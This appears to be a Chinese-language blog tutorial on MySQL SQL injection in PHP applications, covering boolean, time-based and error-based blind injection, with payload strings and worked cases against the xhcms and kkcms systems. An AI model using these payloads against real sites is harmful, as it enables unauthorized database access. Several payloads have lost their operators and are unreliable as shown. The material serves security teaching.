专业app网站建设哪家好,甘肃酒泉建设银行网站,物流公司名字,郑州模板建站多少钱目录
PHP-MYSQL-SQL操作-增删改查
PHP-MYSQL-注入函数-布尔报错延迟
基于布尔的SQL盲注-逻辑判断(需要有回显,没回显搞不了)跟union需要的条件差不多
基于时间的SQL盲注-延时判断(不需要任何回显)
基于报错的SQL盲注-报错回显(需要报错回显#xff0c;没报错回…目录
PHP-MYSQL-SQL操作-增删改查
PHP-MYSQL-注入函数-布尔报错延迟
基于布尔的SQL盲注-逻辑判断(需要有回显,没回显搞不了)跟union需要的条件差不多
基于时间的SQL盲注-延时判断(不需要任何回显)
基于报错的SQL盲注-报错回显(需要报错回显没报错回显玩不了)
PHP-MYSQL-注入条件-数据回显错误处理
PHP-MYSQL-CMS案例-插入报错删除延迟 知识点 1、PHP-MYSQL-SQL注入-方式增删改查 2、PHP-MYSQL-SQL注入-布尔延迟报错 3、PHP-MYSQL-SQL注入-数据回显报错处理 PHP-MYSQL-SQL操作-增删改查
功能数据查询(对数据感兴趣) 一般能用union、布尔盲注
查询SELECT * FROM news where id$id功能新增用户添加新闻等对数据不感兴趣只对操作结果感兴趣延时、报错注入
增加INSERT INTO news (字段名) VALUES (数据)功能删除用户删除新闻等对数据不感兴趣只对操作结果感兴趣延时、报错注入
删除DELETE FROM news WHERE id$id功能修改用户修改文章等对数据不感兴趣只对操作结果感兴趣延时、报错注入
修改UPDATE news SET id$id就是因为查与增删改的区别不同所以才有了盲注的知识点 PHP-MYSQL-注入函数-布尔报错延迟 盲注就是在注入过程中获取的数据不能回显至前端页面。 我们需要利用一些方法进行判断或者尝试这个过程称之为盲注。 解决常规的联合查询注入不行的情况 我们可以知道盲注分为以下三类 1、基于布尔的SQL盲注-逻辑判断 regexp,like,ascii,left,ord,mid 2、基于时间的SQL盲注-延时判断 if,sleep 3、基于报错的SQL盲注-报错回显 floorupdatexmlextractvalue 参考
like ro% #判断ro或ro...是否成立
regexp ^xiaodi[a-z] #匹配xiaodi及xiaodi...等
if(条件,5,0) #条件成立 返回5 反之 返回0
sleep(5) #SQL语句延时执行5秒
mid(a,b,c) #从位置b开始截取a字符串的c位
substr(a,b,c) #从位置b开始截取字符串a的c长度
left(database(),1)database() #left(a,b)从左侧截取a的前b位
length(database())8 #判断数据库database()名的长度
ordascii ascii(x)97 #判断x的ascii码是否等于97基于布尔的SQL盲注-逻辑判断(需要有回显,没回显搞不了)跟union需要的条件差不多 and length ( database ()) 7 ; and left(database(),1)p; and left(database(),2)pi; and substr(database(),1,1)p; and substr(database(),2,1)i; and ord(left(database(),1))112; regexp,like,ascii,left,ord,mid
and length(database())7; //判断数据库database()名的长度是不是等于7 and left(database(),1)‘p’; //left(a,b)从左侧截取a的前b位 and left(database(),2)‘pi’; //left(a,b)从左侧截取a的前b位 基于时间的SQL盲注-延时判断(不需要任何回显) and sleep ( 1 ); and if(12,sleep(1),0); and if(12,sleep(1),0); 基于报错的SQL盲注-报错回显(需要报错回显没报错回显玩不了) and updatexml ( 1 , concat ( 0x7e ,( SELECT version ()), 0x7e ), 1 ) and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 更多https://www.jianshu.com/p/bc35f8dd4f7c PHP-MYSQL-注入条件-数据回显错误处理 PHP 开发项目 - 输出结果 开启报错 基于延时都不需要 and if(11,sleep(5),0) 基于布尔有数据库输出判断标准 and length(database())6 基于报错有数据库报错处理判断标准 and updatexml(1,concat(0x7e,(SELECT version),0x7e),1) 测试delete注入有无回显有无报错 删除延迟1 and if(11,sleep(5),0) 删除布尔3 and length(database())6无回显 无法判断注入 删除报错4 and updatexml(1,concat(0x7e,(SELECT version),0x7e),1) 测试delete注入有无回显有无报错 删除延迟1 and if(11,sleep(5),0)
删除布尔3 and length(database())6无回显 无法判断注入
删除报错4 and updatexml(1,concat(0x7e,(SELECT version),0x7e),1) PHP-MYSQL-CMS案例-插入报错删除延迟
xhcms-insert报错 ’ and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and ’ //需要加单引号进行闭合 kkcms-delete延时(当访问php脚本页面空白时就要想到会不会出现其他脚本包含该脚本的情况并且其他脚本里写有HTML代码去进行调用) and if(11,sleep(5),0) and的是前后条件都符合才行 or if(11,sleep(5),0) or是前后条件符合一个就可以 or if(ord(left(database(),1))107,sleep(2),0)
